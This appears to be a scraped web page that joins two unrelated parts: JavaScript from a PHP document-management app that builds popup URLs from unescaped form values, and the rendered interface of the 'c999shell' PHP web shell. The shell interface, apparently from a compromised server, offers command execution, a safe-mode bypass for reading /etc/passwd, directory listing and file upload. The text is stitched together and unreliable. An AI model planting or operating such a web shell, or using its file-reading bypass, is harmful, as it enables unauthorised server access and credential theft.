            FileName = "editDocRefTable.php?DocID="+Docid+"&RsID=<?  echo $RsID;?>&DtID=<?  echo $DtID?>&DocfCir=<?  echo $DocfCir;  ?>&DocNo="+d+"&DocDate="+docDate+"&DocSubject="+DocSubject+"&DocFrom="+fname+"&DocTo="+DocTo+"&DocOther="+DocOther+"&DslID="+DslID+"&DclID="+DclID+"&DocShortDesc="+DocShortDesc+"&endDoc="+endDoc+"&DocRef="+DocRef+"&useMainDocNo="+s;
            var w=350;  
            var h=300;
            strOption = "scrollbars=yes,left=400,top=100,width=" + w + ",height=" + h;
            window.open(FileName,"",strOption); 
        
}
function editDocRef2(d,Docid,s){ 
    docDate=document.ff.DocDate.value;
    DocSubject=document.ff.DocSubject.value;
    DocFrom=document.ff.DocFrom.value;
    DocOther=document.ff.DocOther.value;
    DocNo=document.ff.DocNo.value;
    DslID=document.ff.DslID.value;
    DclID=document.ff.DclID.value;
    DocShortDesc=document.ff.DocShortDesc.value;
    DocRef=document.ff.DocRef.value;
    if(document.ff.endDoc.checked==true){  endDoc="Y"; }else{ endDoc=""; }
    if(document.ff.DrsSendToPs.checked==true){  DrsSendToPs="Y"; }else{ DrsSendToPs=""; }
            FileName = "editDocRefTable.php?DocID="+Docid+"&RsID=<?  echo $RsID;?>&DtID=<?  echo $DtID?>&DocfCir=<?  echo $DocfCir;  ?>&DocNo="+DocNo+"&DocDate="+docDate+"&DocSubject="+DocSubject+"&DocFrom="+DocFrom+"&DocTo="+d+"&DocOther="+DocOther+"&DslID="+DslID+"&DclID="+DclID+"&DocShortDesc="+DocShortDesc+"&endDoc="+endDoc+"&DocRef="+DocRef+"&DrsSendToPs="+DrsSendToPs+"&useMainDocNo="+s;
            var w=350;  
            var h=300;
            strOption = "scrollbars=yes,left=400,top=100,width=" + w + ",height=" + h;
            window.open(FileName,"",strOption); 
            
}
function editDocRefAns(d,Docid,p,q,s){ 
    docDate=document.ff.DocDate.value;
    DocSubject=document.ff.DocSubject.value;
    DocTo=document.ff.DocTo.value;
    DslID=document.ff.DslID.value;
    DclID=document.ff.DclID.value;
    DocShortDesc=document.ff.DocShortDesc.value;
    DocRefAns=document.ff.DocRefAns.value;
    if(document.ff.endDoc.checked==true){  endDoc="Y"; }else{ endDoc=""; }
            FileName = "editDocRefAnsTable.php?DLCID="+p+"&DlcPS2="+q+"&DocID="+Docid+"&RsID=<?  echo $RsID;?>&DtID=<?  echo $DtID?>&DocNo="+d+"&DocDate="+docDate+"&DocSubject="+DocSubject+"&DocTo="+DocTo+"&DslID="+DslID+"&DclID="+DclID+"&DocShortDesc="+DocShortDesc+"&endDoc="+endDoc+"&DocRefAns="+DocRefAns+"&useMainDocNo="+s;
            var w=390;  
            var h=300;
            strOption = "scrollbars=yes,left=400,top=100,width=" + w + ",height=" + h;
            window.open(FileName,"",strOption); 
        
}
</script>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0178 ]--